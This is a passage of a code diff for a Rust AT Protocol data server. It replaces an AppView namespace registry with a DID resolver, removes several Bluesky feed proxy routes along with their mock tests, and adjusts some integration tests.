headers: HeaderMap,
188
+
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
189
Json(input): Json<CreateRecordInput>,
190
) -> Response {
191
let (did, user_id, current_root_cid) =
192
+
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
193
Ok(res) => res,
194
Err(err_res) => return err_res,
195
};
···
353
pub async fn put_record(
354
State(state): State<AppState>,
355
headers: HeaderMap,
356
+
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
357
Json(input): Json<PutRecordInput>,
358
) -> Response {
359
let (did, user_id, current_root_cid) =
360
+
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
361
Ok(res) => res,
362
Err(err_res) => return err_res,
363
};
+27
-145
src/appview/mod.rs
+27
-145
src/appview/mod.rs
···
1
use reqwest::Client;
2
use serde::{Deserialize, Serialize};
3
use std::collections::HashMap;
4
use std::time::{Duration, Instant};
5
use tokio::sync::RwLock;
6
use tracing::{debug, error, info, warn};
···
22
}
23
24
#[derive(Clone)]
25
-
struct CachedAppView {
26
url: String,
27
did: String,
28
resolved_at: Instant,
29
}
30
31
-
pub struct AppViewRegistry {
32
-
namespace_to_did: HashMap<String, String>,
33
-
did_cache: RwLock<HashMap<String, CachedAppView>>,
34
client: Client,
35
cache_ttl: Duration,
36
plc_directory_url: String,
37
}
38
39
-
impl Clone for AppViewRegistry {
40
fn clone(&self) -> Self {
41
Self {
42
-
namespace_to_did: self.namespace_to_did.clone(),
43
did_cache: RwLock::new(HashMap::new()),
44
client: self.client.clone(),
45
cache_ttl: self.cache_ttl,
···
48
}
49
}
50
51
-
#[derive(Debug, Clone)]
52
-
pub struct ResolvedAppView {
53
-
pub url: String,
54
-
pub did: String,
55
-
}
56
-
57
-
impl AppViewRegistry {
58
pub fn new() -> Self {
59
-
let mut namespace_to_did = HashMap::new();
60
-
61
-
let bsky_did = std::env::var("APPVIEW_DID_BSKY")
62
-
.unwrap_or_else(|_| "did:web:api.bsky.app".to_string());
63
-
namespace_to_did.insert("app.bsky".to_string(), bsky_did.clone());
64
-
namespace_to_did.insert("com.atproto".to_string(), bsky_did);
65
-
66
-
for (key, value) in std::env::vars() {
67
-
if let Some(namespace) = key.strip_prefix("APPVIEW_DID_") {
68
-
let namespace = namespace.to_lowercase().replace('_', ".");
69
-
if namespace != "bsky" {
70
-
namespace_to_did.insert(namespace, value);
71
-
}
72
-
}
73
-
}
74
-
75
-
let cache_ttl_secs: u64 = std::env::var("APPVIEW_CACHE_TTL_SECS")
76
.ok()
77
.and_then(|v| v.parse().ok())
78
.unwrap_or(300);
···
87
.build()
88
.unwrap_or_else(|_| Client::new());
89
90
-
info!(
91
-
"AppView registry initialized with {} namespace mappings",
92
-
namespace_to_did.len()
93
-
);
94
-
for (ns, did) in &namespace_to_did {
95
-
debug!(" {} -> {}", ns, did);
96
-
}
97
98
Self {
99
-
namespace_to_did,
100
did_cache: RwLock::new(HashMap::new()),
101
client,
102
cache_ttl: Duration::from_secs(cache_ttl_secs),
···
104
}
105
}
106
107
-
pub fn register_namespace(&mut self, namespace: &str, did: &str) {
108
-
info!("Registering AppView: {} -> {}", namespace, did);
109
-
self.namespace_to_did
110
-
.insert(namespace.to_string(), did.to_string());
111
-
}
112
-
113
-
pub async fn get_appview_for_method(&self, method: &str) -> Option<ResolvedAppView> {
114
-
let namespace = self.extract_namespace(method)?;
115
-
self.get_appview_for_namespace(&namespace).await
116
-
}
117
-
118
-
pub async fn get_appview_for_namespace(&self, namespace: &str) -> Option<ResolvedAppView> {
119
-
let did = self.get_did_for_namespace(namespace)?;
120
-
self.resolve_appview_did(&did).await
121
-
}
122
-
123
-
pub fn get_did_for_namespace(&self, namespace: &str) -> Option<String> {
124
-
if let Some(did) = self.namespace_to_did.get(namespace) {
125
-
return Some(did.clone());
126
-
}
127
-
128
-
let mut parts: Vec<&str> = namespace.split('.').collect();
129
-
while !parts.is_empty() {
130
-
let prefix = parts.join(".");
131
-
if let Some(did) = self.namespace_to_did.get(&prefix) {
132
-
return Some(did.clone());
133
-
}
134
-
parts.pop();
135
-
}
136
-
137
-
None
138
-
}
139
-
140
-
pub async fn resolve_appview_did(&self, did: &str) -> Option<ResolvedAppView> {
141
{
142
let cache = self.did_cache.read().await;
143
if let Some(cached) = cache.get(did) {
144
if cached.resolved_at.elapsed() < self.cache_ttl {
145
-
return Some(ResolvedAppView {
146
url: cached.url.clone(),
147
did: cached.did.clone(),
148
});
···
156
let mut cache = self.did_cache.write().await;
157
cache.insert(
158
did.to_string(),
159
-
CachedAppView {
160
url: resolved.url.clone(),
161
did: resolved.did.clone(),
162
resolved_at: Instant::now(),
···
167
Some(resolved)
168
}
169
170
-
async fn resolve_did_internal(&self, did: &str) -> Option<ResolvedAppView> {
171
let did_doc = if did.starts_with("did:web:") {
172
self.resolve_did_web(did).await
173
} else if did.starts_with("did:plc:") {
···
185
}
186
};
187
188
-
self.extract_appview_endpoint(&doc)
189
}
190
191
async fn resolve_did_web(&self, did: &str) -> Result<DidDocument, String> {
···
275
.map_err(|e| format!("Failed to parse DID document: {}", e))
276
}
277
278
-
fn extract_appview_endpoint(&self, doc: &DidDocument) -> Option<ResolvedAppView> {
279
for service in &doc.service {
280
if service.service_type == "AtprotoAppView"
281
|| service.id.contains("atproto_appview")
282
|| service.id.ends_with("#bsky_appview")
283
{
284
-
return Some(ResolvedAppView {
285
url: service.service_endpoint.clone(),
286
did: doc.id.clone(),
287
});
···
290
291
for service in &doc.service {
292
if service.service_type.contains("AppView") || service.id.contains("appview") {
293
-
return Some(ResolvedAppView {
294
url: service.service_endpoint.clone(),
295
did: doc.id.clone(),
296
});
···
303
"No explicit AppView service found for {}, using first service: {}",
304
doc.id, service.service_endpoint
305
);
306
-
return Some(ResolvedAppView {
307
url: service.service_endpoint.clone(),
308
did: doc.id.clone(),
309
});
···
326
"No service found for {}, deriving URL from DID: {}://{}",
327
doc.id, scheme, base_host
328
);
329
-
return Some(ResolvedAppView {
330
url: format!("{}://{}", scheme, base_host),
331
did: doc.id.clone(),
332
});
···
335
None
336
}
337
338
-
fn extract_namespace(&self, method: &str) -> Option<String> {
339
-
let parts: Vec<&str> = method.split('.').collect();
340
-
if parts.len() >= 2 {
341
-
Some(format!("{}.{}", parts[0], parts[1]))
342
-
} else {
343
-
None
344
-
}
345
-
}
346
-
347
-
pub fn list_namespaces(&self) -> Vec<(String, String)> {
348
-
self.namespace_to_did
349
-
.iter()
350
-
.map(|(k, v)| (k.clone(), v.clone()))
351
-
.collect()
352
-
}
353
-
354
pub async fn invalidate_cache(&self, did: &str) {
355
let mut cache = self.did_cache.write().await;
356
cache.remove(did);
357
}
358
-
359
-
pub async fn invalidate_all_cache(&self) {
360
-
let mut cache = self.did_cache.write().await;
361
-
cache.clear();
362
-
}
363
}
364
365
-
impl Default for AppViewRegistry {
366
fn default() -> Self {
367
Self::new()
368
}
369
}
370
371
-
pub async fn get_appview_url_for_method(registry: &AppViewRegistry, method: &str) -> Option<String> {
372
-
registry.get_appview_for_method(method).await.map(|r| r.url)
373
-
}
374
-
375
-
pub async fn get_appview_did_for_method(registry: &AppViewRegistry, method: &str) -> Option<String> {
376
-
registry.get_appview_for_method(method).await.map(|r| r.did)
377
-
}
378
-
379
-
#[cfg(test)]
380
-
mod tests {
381
-
use super::*;
382
-
383
-
#[test]
384
-
fn test_extract_namespace() {
385
-
let registry = AppViewRegistry::new();
386
-
assert_eq!(
387
-
registry.extract_namespace("app.bsky.actor.getProfile"),
388
-
Some("app.bsky".to_string())
389
-
);
390
-
assert_eq!(
391
-
registry.extract_namespace("com.atproto.repo.createRecord"),
392
-
Some("com.atproto".to_string())
393
-
);
394
-
assert_eq!(
395
-
registry.extract_namespace("com.whtwnd.blog.getPost"),
396
-
Some("com.whtwnd".to_string())
397
-
);
398
-
assert_eq!(registry.extract_namespace("invalid"), None);
399
-
}
400
-
401
-
#[test]
402
-
fn test_get_did_for_namespace() {
403
-
let mut registry = AppViewRegistry::new();
404
-
registry.register_namespace("com.whtwnd", "did:web:whtwnd.com");
405
-
406
-
assert!(registry.get_did_for_namespace("app.bsky").is_some());
407
-
assert_eq!(
408
-
registry.get_did_for_namespace("com.whtwnd"),
409
-
Some("did:web:whtwnd.com".to_string())
410
-
);
411
-
assert!(registry.get_did_for_namespace("unknown.namespace").is_none());
412
-
}
413
}
···
1
use reqwest::Client;
2
use serde::{Deserialize, Serialize};
3
use std::collections::HashMap;
4
+
use std::sync::Arc;
5
use std::time::{Duration, Instant};
6
use tokio::sync::RwLock;
7
use tracing::{debug, error, info, warn};
···
23
}
24
25
#[derive(Clone)]
26
+
struct CachedDid {
27
url: String,
28
did: String,
29
resolved_at: Instant,
30
}
31
32
+
#[derive(Debug, Clone)]
33
+
pub struct ResolvedService {
34
+
pub url: String,
35
+
pub did: String,
36
+
}
37
+
38
+
pub struct DidResolver {
39
+
did_cache: RwLock<HashMap<String, CachedDid>>,
40
client: Client,
41
cache_ttl: Duration,
42
plc_directory_url: String,
43
}
44
45
+
impl Clone for DidResolver {
46
fn clone(&self) -> Self {
47
Self {
48
did_cache: RwLock::new(HashMap::new()),
49
client: self.client.clone(),
50
cache_ttl: self.cache_ttl,
···
53
}
54
}
55
56
+
impl DidResolver {
57
pub fn new() -> Self {
58
+
let cache_ttl_secs: u64 = std::env::var("DID_CACHE_TTL_SECS")
59
.ok()
60
.and_then(|v| v.parse().ok())
61
.unwrap_or(300);
···
70
.build()
71
.unwrap_or_else(|_| Client::new());
72
73
+
info!("DID resolver initialized");
74
75
Self {
76
did_cache: RwLock::new(HashMap::new()),
77
client,
78
cache_ttl: Duration::from_secs(cache_ttl_secs),
···
80
}
81
}
82
83
+
pub async fn resolve_did(&self, did: &str) -> Option<ResolvedService> {
84
{
85
let cache = self.did_cache.read().await;
86
if let Some(cached) = cache.get(did) {
87
if cached.resolved_at.elapsed() < self.cache_ttl {
88
+
return Some(ResolvedService {
89
url: cached.url.clone(),
90
did: cached.did.clone(),
91
});
···
99
let mut cache = self.did_cache.write().await;
100
cache.insert(
101
did.to_string(),
102
+
CachedDid {
103
url: resolved.url.clone(),
104
did: resolved.did.clone(),
105
resolved_at: Instant::now(),
···
110
Some(resolved)
111
}
112
113
+
async fn resolve_did_internal(&self, did: &str) -> Option<ResolvedService> {
114
let did_doc = if did.starts_with("did:web:") {
115
self.resolve_did_web(did).await
116
} else if did.starts_with("did:plc:") {
···
128
}
129
};
130
131
+
self.extract_service_endpoint(&doc)
132
}
133
134
async fn resolve_did_web(&self, did: &str) -> Result<DidDocument, String> {
···
218
.map_err(|e| format!("Failed to parse DID document: {}", e))
219
}
220
221
+
fn extract_service_endpoint(&self, doc: &DidDocument) -> Option<ResolvedService> {
222
for service in &doc.service {
223
if service.service_type == "AtprotoAppView"
224
|| service.id.contains("atproto_appview")
225
|| service.id.ends_with("#bsky_appview")
226
{
227
+
return Some(ResolvedService {
228
url: service.service_endpoint.clone(),
229
did: doc.id.clone(),
230
});
···
233
234
for service in &doc.service {
235
if service.service_type.contains("AppView") || service.id.contains("appview") {
236
+
return Some(ResolvedService {
237
url: service.service_endpoint.clone(),
238
did: doc.id.clone(),
239
});
···
246
"No explicit AppView service found for {}, using first service: {}",
247
doc.id, service.service_endpoint
248
);
249
+
return Some(ResolvedService {
250
url: service.service_endpoint.clone(),
251
did: doc.id.clone(),
252
});
···
269
"No service found for {}, deriving URL from DID: {}://{}",
270
doc.id, scheme, base_host
271
);
272
+
return Some(ResolvedService {
273
url: format!("{}://{}", scheme, base_host),
274
did: doc.id.clone(),
275
});
···
278
None
279
}
280
281
pub async fn invalidate_cache(&self, did: &str) {
282
let mut cache = self.did_cache.write().await;
283
cache.remove(did);
284
}
285
}
286
287
+
impl Default for DidResolver {
288
fn default() -> Self {
289
Self::new()
290
}
291
}
292
293
+
pub fn create_did_resolver() -> Arc<DidResolver> {
294
+
Arc::new(DidResolver::new())
295
}
-29
src/lib.rs
-29
src/lib.rs
···
317
"/xrpc/app.bsky.actor.putPreferences",
318
post(api::actor::put_preferences),
319
)
320
-
.route(
321
-
"/xrpc/app.bsky.actor.getProfile",
322
-
get(api::actor::get_profile),
323
-
)
324
-
.route(
325
-
"/xrpc/app.bsky.actor.getProfiles",
326
-
get(api::actor::get_profiles),
327
-
)
328
-
.route(
329
-
"/xrpc/app.bsky.feed.getTimeline",
330
-
get(api::feed::get_timeline),
331
-
)
332
-
.route(
333
-
"/xrpc/app.bsky.feed.getAuthorFeed",
334
-
get(api::feed::get_author_feed),
335
-
)
336
-
.route(
337
-
"/xrpc/app.bsky.feed.getActorLikes",
338
-
get(api::feed::get_actor_likes),
339
-
)
340
-
.route(
341
-
"/xrpc/app.bsky.feed.getPostThread",
342
-
get(api::feed::get_post_thread),
343
-
)
344
-
.route("/xrpc/app.bsky.feed.getFeed", get(api::feed::get_feed))
345
-
.route(
346
-
"/xrpc/app.bsky.notification.registerPush",
347
-
post(api::notification::register_push),
348
-
)
349
.route("/.well-known/did.json", get(api::identity::well_known_did))
350
.route(
351
"/.well-known/atproto-did",
+4
-4
src/state.rs
+4
-4
src/state.rs
···
1
-
use crate::appview::AppViewRegistry;
2
use crate::cache::{Cache, DistributedRateLimiter, create_cache};
3
use crate::circuit_breaker::CircuitBreakers;
4
use crate::config::AuthConfig;
···
20
pub circuit_breakers: Arc<CircuitBreakers>,
21
pub cache: Arc<dyn Cache>,
22
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
23
-
pub appview_registry: Arc<AppViewRegistry>,
24
}
25
26
pub enum RateLimitKind {
···
87
let rate_limiters = Arc::new(RateLimiters::new());
88
let circuit_breakers = Arc::new(CircuitBreakers::new());
89
let (cache, distributed_rate_limiter) = create_cache().await;
90
-
let appview_registry = Arc::new(AppViewRegistry::new());
91
92
Self {
93
db,
···
98
circuit_breakers,
99
cache,
100
distributed_rate_limiter,
101
-
appview_registry,
102
}
103
}
104
···
1
+
use crate::appview::DidResolver;
2
use crate::cache::{Cache, DistributedRateLimiter, create_cache};
3
use crate::circuit_breaker::CircuitBreakers;
4
use crate::config::AuthConfig;
···
20
pub circuit_breakers: Arc<CircuitBreakers>,
21
pub cache: Arc<dyn Cache>,
22
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
23
+
pub did_resolver: Arc<DidResolver>,
24
}
25
26
pub enum RateLimitKind {
···
87
let rate_limiters = Arc::new(RateLimiters::new());
88
let circuit_breakers = Arc::new(CircuitBreakers::new());
89
let (cache, distributed_rate_limiter) = create_cache().await;
90
+
let did_resolver = Arc::new(DidResolver::new());
91
92
Self {
93
db,
···
98
circuit_breakers,
99
cache,
100
distributed_rate_limiter,
101
+
did_resolver,
102
}
103
}
104
+3
-2
tests/account_notifications.rs
+3
-2
tests/account_notifications.rs
···
170
let pool = get_pool().await;
171
let (token, did) = create_account_and_login(&client).await;
172
173
let prefs = json!({
174
-
"email": "newemail@example.com"
175
});
176
let resp = client
177
.post(format!("{}/xrpc/com.bspds.account.updateNotificationPrefs", base))
···
217
.await
218
.unwrap();
219
let body: Value = resp.json().await.unwrap();
220
-
assert_eq!(body["email"], "newemail@example.com");
221
}
···
170
let pool = get_pool().await;
171
let (token, did) = create_account_and_login(&client).await;
172
173
+
let unique_email = format!("newemail_{}@example.com", uuid::Uuid::new_v4());
174
let prefs = json!({
175
+
"email": unique_email
176
});
177
let resp = client
178
.post(format!("{}/xrpc/com.bspds.account.updateNotificationPrefs", base))
···
218
.await
219
.unwrap();
220
let body: Value = resp.json().await.unwrap();
221
+
assert_eq!(body["email"], unique_email);
222
}
+3
-2
tests/admin_search.rs
+3
-2
tests/admin_search.rs
···
12
let (user_did, _) = setup_new_user("search-target").await;
13
let res = client
14
.get(format!(
15
-
"{}/xrpc/com.atproto.admin.searchAccounts",
16
base_url().await
17
))
18
.bearer_auth(&admin_jwt)
···
24
let accounts = body["accounts"].as_array().expect("accounts should be array");
25
assert!(!accounts.is_empty(), "Should return some accounts");
26
let found = accounts.iter().any(|a| a["did"].as_str() == Some(&user_did));
27
-
assert!(found, "Should find the created user in results");
28
}
29
30
#[tokio::test]
···
111
#[tokio::test]
112
async fn test_search_accounts_requires_admin() {
113
let client = client();
114
let (_, user_jwt) = setup_new_user("search-nonadmin").await;
115
let res = client
116
.get(format!(
···
12
let (user_did, _) = setup_new_user("search-target").await;
13
let res = client
14
.get(format!(
15
+
"{}/xrpc/com.atproto.admin.searchAccounts?limit=1000",
16
base_url().await
17
))
18
.bearer_auth(&admin_jwt)
···
24
let accounts = body["accounts"].as_array().expect("accounts should be array");
25
assert!(!accounts.is_empty(), "Should return some accounts");
26
let found = accounts.iter().any(|a| a["did"].as_str() == Some(&user_did));
27
+
assert!(found, "Should find the created user in results (DID: {})", user_did);
28
}
29
30
#[tokio::test]
···
111
#[tokio::test]
112
async fn test_search_accounts_requires_admin() {
113
let client = client();
114
+
let _ = create_account_and_login(&client).await;
115
let (_, user_jwt) = setup_new_user("search-nonadmin").await;
116
let res = client
117
.get(format!(
-135
tests/appview_integration.rs
-135
tests/appview_integration.rs
···
1
-
mod common;
2
-
3
-
use common::{base_url, client, create_account_and_login};
4
-
use reqwest::StatusCode;
5
-
use serde_json::{Value, json};
6
-
7
-
#[tokio::test]
8
-
async fn test_get_author_feed_returns_appview_data() {
9
-
let client = client();
10
-
let base = base_url().await;
11
-
let (jwt, did) = create_account_and_login(&client).await;
12
-
let res = client
13
-
.get(format!(
14
-
"{}/xrpc/app.bsky.feed.getAuthorFeed?actor={}",
15
-
base, did
16
-
))
17
-
.header("Authorization", format!("Bearer {}", jwt))
18
-
.send()
19
-
.await
20
-
.unwrap();
21
-
assert_eq!(res.status(), StatusCode::OK);
22
-
let body: Value = res.json().await.unwrap();
23
-
assert!(body["feed"].is_array(), "Response should have feed array");
24
-
let feed = body["feed"].as_array().unwrap();
25
-
assert_eq!(feed.len(), 1, "Feed should have 1 post from appview");
26
-
assert_eq!(
27
-
feed[0]["post"]["record"]["text"].as_str(),
28
-
Some("Author feed post from appview"),
29
-
"Post text should match appview response"
30
-
);
31
-
}
32
-
33
-
#[tokio::test]
34
-
async fn test_get_actor_likes_returns_appview_data() {
35
-
let client = client();
36
-
let base = base_url().await;
37
-
let (jwt, did) = create_account_and_login(&client).await;
38
-
let res = client
39
-
.get(format!(
40
-
"{}/xrpc/app.bsky.feed.getActorLikes?actor={}",
41
-
base, did
42
-
))
43
-
.header("Authorization", format!("Bearer {}", jwt))
44
-
.send()
45
-
.await
46
-
.unwrap();
47
-
assert_eq!(res.status(), StatusCode::OK);
48
-
let body: Value = res.json().await.unwrap();
49
-
assert!(body["feed"].is_array(), "Response should have feed array");
50
-
let feed = body["feed"].as_array().unwrap();
51
-
assert_eq!(feed.len(), 1, "Feed should have 1 liked post from appview");
52
-
assert_eq!(
53
-
feed[0]["post"]["record"]["text"].as_str(),
54
-
Some("Liked post from appview"),
55
-
"Post text should match appview response"
56
-
);
57
-
}
58
-
59
-
#[tokio::test]
60
-
async fn test_get_post_thread_returns_appview_data() {
61
-
let client = client();
62
-
let base = base_url().await;
63
-
let (jwt, did) = create_account_and_login(&client).await;
64
-
let res = client
65
-
.get(format!(
66
-
"{}/xrpc/app.bsky.feed.getPostThread?uri=at://{}/app.bsky.feed.post/test123",
67
-
base, did
68
-
))
69
-
.header("Authorization", format!("Bearer {}", jwt))
70
-
.send()
71
-
.await
72
-
.unwrap();
73
-
assert_eq!(res.status(), StatusCode::OK);
74
-
let body: Value = res.json().await.unwrap();
75
-
assert!(
76
-
body["thread"].is_object(),
77
-
"Response should have thread object"
78
-
);
79
-
assert_eq!(
80
-
body["thread"]["$type"].as_str(),
81
-
Some("app.bsky.feed.defs#threadViewPost"),
82
-
"Thread should be a threadViewPost"
83
-
);
84
-
assert_eq!(
85
-
body["thread"]["post"]["record"]["text"].as_str(),
86
-
Some("Thread post from appview"),
87
-
"Post text should match appview response"
88
-
);
89
-
}
90
-
91
-
#[tokio::test]
92
-
async fn test_get_feed_returns_appview_data() {
93
-
let client = client();
94
-
let base = base_url().await;
95
-
let (jwt, _did) = create_account_and_login(&client).await;
96
-
let res = client
97
-
.get(format!(
98
-
"{}/xrpc/app.bsky.feed.getFeed?feed=at://did:plc:test/app.bsky.feed.generator/test",
99
-
base
100
-
))
101
-
.header("Authorization", format!("Bearer {}", jwt))
102
-
.send()
103
-
.await
104
-
.unwrap();
105
-
assert_eq!(res.status(), StatusCode::OK);
106
-
let body: Value = res.json().await.unwrap();
107
-
assert!(body["feed"].is_array(), "Response should have feed array");
108
-
let feed = body["feed"].as_array().unwrap();
109
-
assert_eq!(feed.len(), 1, "Feed should have 1 post from appview");
110
-
assert_eq!(
111
-
feed[0]["post"]["record"]["text"].as_str(),
112
-
Some("Custom feed post from appview"),
113
-
"Post text should match appview response"
114
-
);
115
-
}
116
-
117
-
#[tokio::test]
118
-
async fn test_register_push_proxies_to_appview() {
119
-
let client = client();
120
-
let base = base_url().await;
121
-
let (jwt, _did) = create_account_and_login(&client).await;
122
-
let res = client
123
-
.post(format!("{}/xrpc/app.bsky.notification.registerPush", base))
124
-
.header("Authorization", format!("Bearer {}", jwt))
125
-
.json(&json!({
126
-
"serviceDid": "did:web:example.com",
127
-
"token": "test-push-token",
128
-
"platform": "ios",
129
-
"appId": "xyz.bsky.app"
130
-
}))
131
-
.send()
132
-
.await
133
-
.unwrap();
134
-
assert_eq!(res.status(), StatusCode::OK);
135
-
}
···
+1
-134
tests/common/mod.rs
+1
-134
tests/common/mod.rs
···
141
let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri);
142
let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A"));
143
setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await;
144
-
unsafe {
145
-
std::env::set_var("APPVIEW_DID_APP_BSKY", &mock_did);
146
-
}
147
MOCK_APPVIEW.set(mock_server).ok();
148
spawn_app(database_url).await
149
}
···
194
let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri);
195
let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A"));
196
setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await;
197
-
unsafe {
198
-
std::env::set_var("APPVIEW_DID_APP_BSKY", &mock_did);
199
-
}
200
MOCK_APPVIEW.set(mock_server).ok();
201
S3_CONTAINER.set(s3_container).ok();
202
let container = Postgres::default()
···
238
.await;
239
}
240
241
-
async fn setup_mock_appview(mock_server: &MockServer) {
242
-
Mock::given(method("GET"))
243
-
.and(path("/xrpc/app.bsky.actor.getProfile"))
244
-
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
245
-
"handle": "mock.handle",
246
-
"did": "did:plc:mock",
247
-
"displayName": "Mock User"
248
-
})))
249
-
.mount(mock_server)
250
-
.await;
251
-
Mock::given(method("GET"))
252
-
.and(path("/xrpc/app.bsky.actor.searchActors"))
253
-
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
254
-
"actors": [],
255
-
"cursor": null
256
-
})))
257
-
.mount(mock_server)
258
-
.await;
259
-
Mock::given(method("GET"))
260
-
.and(path("/xrpc/app.bsky.feed.getTimeline"))
261
-
.respond_with(
262
-
ResponseTemplate::new(200)
263
-
.insert_header("atproto-repo-rev", "0")
264
-
.set_body_json(json!({
265
-
"feed": [],
266
-
"cursor": null
267
-
})),
268
-
)
269
-
.mount(mock_server)
270
-
.await;
271
-
Mock::given(method("GET"))
272
-
.and(path("/xrpc/app.bsky.feed.getAuthorFeed"))
273
-
.respond_with(
274
-
ResponseTemplate::new(200)
275
-
.insert_header("atproto-repo-rev", "0")
276
-
.set_body_json(json!({
277
-
"feed": [{
278
-
"post": {
279
-
"uri": "at://did:plc:mock-author/app.bsky.feed.post/from-appview-author",
280
-
"cid": "bafyappview123",
281
-
"author": {"did": "did:plc:mock-author", "handle": "mock.author"},
282
-
"record": {
283
-
"$type": "app.bsky.feed.post",
284
-
"text": "Author feed post from appview",
285
-
"createdAt": "2025-01-01T00:00:00Z"
286
-
},
287
-
"indexedAt": "2025-01-01T00:00:00Z"
288
-
}
289
-
}],
290
-
"cursor": "author-cursor"
291
-
})),
292
-
)
293
-
.mount(mock_server)
294
-
.await;
295
-
Mock::given(method("GET"))
296
-
.and(path("/xrpc/app.bsky.feed.getActorLikes"))
297
-
.respond_with(
298
-
ResponseTemplate::new(200)
299
-
.insert_header("atproto-repo-rev", "0")
300
-
.set_body_json(json!({
301
-
"feed": [{
302
-
"post": {
303
-
"uri": "at://did:plc:mock-likes/app.bsky.feed.post/liked-post",
304
-
"cid": "bafyliked123",
305
-
"author": {"did": "did:plc:mock-likes", "handle": "mock.likes"},
306
-
"record": {
307
-
"$type": "app.bsky.feed.post",
308
-
"text": "Liked post from appview",
309
-
"createdAt": "2025-01-01T00:00:00Z"
310
-
},
311
-
"indexedAt": "2025-01-01T00:00:00Z"
312
-
}
313
-
}],
314
-
"cursor": null
315
-
})),
316
-
)
317
-
.mount(mock_server)
318
-
.await;
319
-
Mock::given(method("GET"))
320
-
.and(path("/xrpc/app.bsky.feed.getPostThread"))
321
-
.respond_with(
322
-
ResponseTemplate::new(200)
323
-
.insert_header("atproto-repo-rev", "0")
324
-
.set_body_json(json!({
325
-
"thread": {
326
-
"$type": "app.bsky.feed.defs#threadViewPost",
327
-
"post": {
328
-
"uri": "at://did:plc:mock/app.bsky.feed.post/thread-post",
329
-
"cid": "bafythread123",
330
-
"author": {"did": "did:plc:mock", "handle": "mock.handle"},
331
-
"record": {
332
-
"$type": "app.bsky.feed.post",
333
-
"text": "Thread post from appview",
334
-
"createdAt": "2025-01-01T00:00:00Z"
335
-
},
336
-
"indexedAt": "2025-01-01T00:00:00Z"
337
-
},
338
-
"replies": []
339
-
}
340
-
})),
341
-
)
342
-
.mount(mock_server)
343
-
.await;
344
-
Mock::given(method("GET"))
345
-
.and(path("/xrpc/app.bsky.feed.getFeed"))
346
-
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
347
-
"feed": [{
348
-
"post": {
349
-
"uri": "at://did:plc:mock-feed/app.bsky.feed.post/custom-feed-post",
350
-
"cid": "bafyfeed123",
351
-
"author": {"did": "did:plc:mock-feed", "handle": "mock.feed"},
352
-
"record": {
353
-
"$type": "app.bsky.feed.post",
354
-
"text": "Custom feed post from appview",
355
-
"createdAt": "2025-01-01T00:00:00Z"
356
-
},
357
-
"indexedAt": "2025-01-01T00:00:00Z"
358
-
}
359
-
}],
360
-
"cursor": null
361
-
})))
362
-
.mount(mock_server)
363
-
.await;
364
-
Mock::given(method("POST"))
365
-
.and(path("/xrpc/app.bsky.notification.registerPush"))
366
-
.respond_with(ResponseTemplate::new(200))
367
-
.mount(mock_server)
368
-
.await;
369
}
370
371
async fn spawn_app(database_url: String) -> String {
···
141
let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri);
142
let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A"));
143
setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await;
144
MOCK_APPVIEW.set(mock_server).ok();
145
spawn_app(database_url).await
146
}
···
191
let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri);
192
let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A"));
193
setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await;
194
MOCK_APPVIEW.set(mock_server).ok();
195
S3_CONTAINER.set(s3_container).ok();
196
let container = Postgres::default()
···
232
.await;
233
}
234
235
+
async fn setup_mock_appview(_mock_server: &MockServer) {
236
}
237
238
async fn spawn_app(database_url: String) -> String {
-104
tests/feed.rs
-104
tests/feed.rs
···
1
-
mod common;
2
-
use common::{base_url, client, create_account_and_login};
3
-
use serde_json::json;
4
-
5
-
#[tokio::test]
6
-
async fn test_get_timeline_requires_auth() {
7
-
let client = client();
8
-
let base = base_url().await;
9
-
let res = client
10
-
.get(format!("{}/xrpc/app.bsky.feed.getTimeline", base))
11
-
.send()
12
-
.await
13
-
.unwrap();
14
-
assert_eq!(res.status(), 401);
15
-
}
16
-
17
-
#[tokio::test]
18
-
async fn test_get_author_feed_requires_actor() {
19
-
let client = client();
20
-
let base = base_url().await;
21
-
let (jwt, _did) = create_account_and_login(&client).await;
22
-
let res = client
23
-
.get(format!("{}/xrpc/app.bsky.feed.getAuthorFeed", base))
24
-
.header("Authorization", format!("Bearer {}", jwt))
25
-
.send()
26
-
.await
27
-
.unwrap();
28
-
assert_eq!(res.status(), 400);
29
-
}
30
-
31
-
#[tokio::test]
32
-
async fn test_get_actor_likes_requires_actor() {
33
-
let client = client();
34
-
let base = base_url().await;
35
-
let (jwt, _did) = create_account_and_login(&client).await;
36
-
let res = client
37
-
.get(format!("{}/xrpc/app.bsky.feed.getActorLikes", base))
38
-
.header("Authorization", format!("Bearer {}", jwt))
39
-
.send()
40
-
.await
41
-
.unwrap();
42
-
assert_eq!(res.status(), 400);
43
-
}
44
-
45
-
#[tokio::test]
46
-
async fn test_get_post_thread_requires_uri() {
47
-
let client = client();
48
-
let base = base_url().await;
49
-
let (jwt, _did) = create_account_and_login(&client).await;
50
-
let res = client
51
-
.get(format!("{}/xrpc/app.bsky.feed.getPostThread", base))
52
-
.header("Authorization", format!("Bearer {}", jwt))
53
-
.send()
54
-
.await
55
-
.unwrap();
56
-
assert_eq!(res.status(), 400);
57
-
}
58
-
59
-
#[tokio::test]
60
-
async fn test_get_feed_requires_auth() {
61
-
let client = client();
62
-
let base = base_url().await;
63
-
let res = client
64
-
.get(format!(
65
-
"{}/xrpc/app.bsky.feed.getFeed?feed=at://did:plc:test/app.bsky.feed.generator/test",
66
-
base
67
-
))
68
-
.send()
69
-
.await
70
-
.unwrap();
71
-
assert_eq!(res.status(), 401);
72
-
}
73
-
74
-
#[tokio::test]
75
